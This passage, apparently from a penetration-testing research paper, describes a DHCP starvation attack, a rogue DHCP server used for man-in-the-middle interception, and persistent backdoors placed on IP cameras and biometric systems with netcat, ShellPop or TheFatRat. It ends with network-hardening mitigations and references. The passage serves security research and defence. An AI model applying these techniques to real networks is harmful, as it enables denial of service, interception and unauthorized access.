DHCP starvation is an attack that targets DHCP servers, in which malicious DHCP requests are made to exhaust the pool of all available IP addresses. As a result, legitimate network users suffer a DoS. DHCP starvation can be launched even with minimal bandwidth [9].
In our attack, as can be seen in Figure 20, a DHCP Release message is sent as a broadcast in the VLAN to release the users' IP addresses, followed immediately by DHCP Request messages to completely exhaust the IP pool of the DHCP server.
Fig. 20: DHCP Attack
Afterwards, a rogue DHCP server can be created to assign IP addresses through our system and then perform a Man-In-The-Middle attack on the victims who have obtained IP addresses through the rogue DHCP server.
D. Post Exploitation
The purpose of this phase is to create an alternate way into the system so that access to the compromised systems remains intact. For that, backdoors were created and then deployed on compromised IP cameras and biometric systems. In the biometric systems, a persistent backdoor was created via the netcat tool. However, different vendors of IP cameras (and even some biometric systems) do not support the netcat tool, so in order to create persistent backdoors on such systems, tools like ShellPop or TheFatRat can be used.
IV. CONCLUSION
Securing the network of an organization requires penetration testing. This helps to identify vulnerabilities which could be exploited with malicious intent. Network administrators should be aware of the security aspects of the different protocol configurations on networking devices. This awareness helps employees to avoid internal, external, and social engineering attacks on the network. Moreover, a well-thought-out security policy which aligns with the organization's needs is a very important factor when deploying a network.
The following steps must be taken to mitigate the threats outlined in this research paper.
(1) Change the default credentials of all the protocols configured in the network. Devices which allow unauthenticated access should not be allowed remote access; alternatively, restricted access should be allowed to authorized users by deploying specific security policies.
(2) Configure port security to prevent the DHCP starvation attack.
(3) Enable the DHCP snooping feature to prevent rogue DHCP server attacks.
(4) ARP attacks can be prevented by Dynamic ARP Inspection (DAI).
(5) IP/MAC spoofing can be prevented using the IP Source Guard (IPSG) feature.
(6) SSH should be used instead of Telnet to configure network devices remotely, as Telnet establishes a session in which information flows in plain text that can easily be sniffed via Wireshark or any other sniffing tool.
(7) Passwords must be set for all VTY sessions and not just for the first three or four sessions; otherwise an attacker can exploit this to attack the network.
(8) Port security should be enabled on all the active interfaces (access ports) of a switch, and all unused ports should be shut down to avoid unauthorized access.
(9) IDS or ARP inspection prevents ARP attacks.
(10) For prevention of attacks related to STP, the BPDU Guard and Root Guard features should be enabled.
(11) Use VTP version 3 to fend off VTP attacks.
(12) Use CDP only when it is necessary.
REFERENCES
[1] S. Türpe and J. Eichler. Testing production systems safely: Common precautions in penetration testing. pages 205–209, Oct 2009.
[2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh. Penetration testing in the IoT age. Computer, 51:82–85, Apr 2018.
[3] Matt Bishop. About penetration testing. IEEE Security and Privacy, 5(6):84–87, 2007.
[4] Erik Tews and Martin Beck. Practical attacks against WEP and WPA. In Proceedings of the second ACM conference on Wireless network security, pages 79–86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286, last accessed on 2019-09-30.
[5] Joseph Mwangi, Wilson Cheruiyo, and Michael Kimwel. Security analysis of WPA2. Control Theory and Informatics, 5, 2015. https://pdfs.semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf, last accessed on 2019-09-30.
[6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang Samadi. A survey on wireless security protocols (WEP, WPA and WPA2/802.11i). In 2009 2nd IEEE International Conference on Computer Science and Information Technology, pages 48–52. IEEE, 2009. https://ieeexplore.ieee.org/abstract/document/5234856, last accessed on 2019-10-12.
[7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The WannaCry ransomware, a mega cyber attack and their consequences on the modern India. International Journal of Information Technology, 6(4):1–4, Apr 2018.
[8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza Minhas. Recent study of close circuit television (CCTV) in hacking. International Journal of Advance Research in Science and Engineering, 6(4):551–561, Apr 2017.
[9] N. Tripathi and N. Hubballi. Exploiting DHCP server-side IP address conflict detection: A DHCP starvation attack. In 2015 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS), pages 1–3, Dec 2015.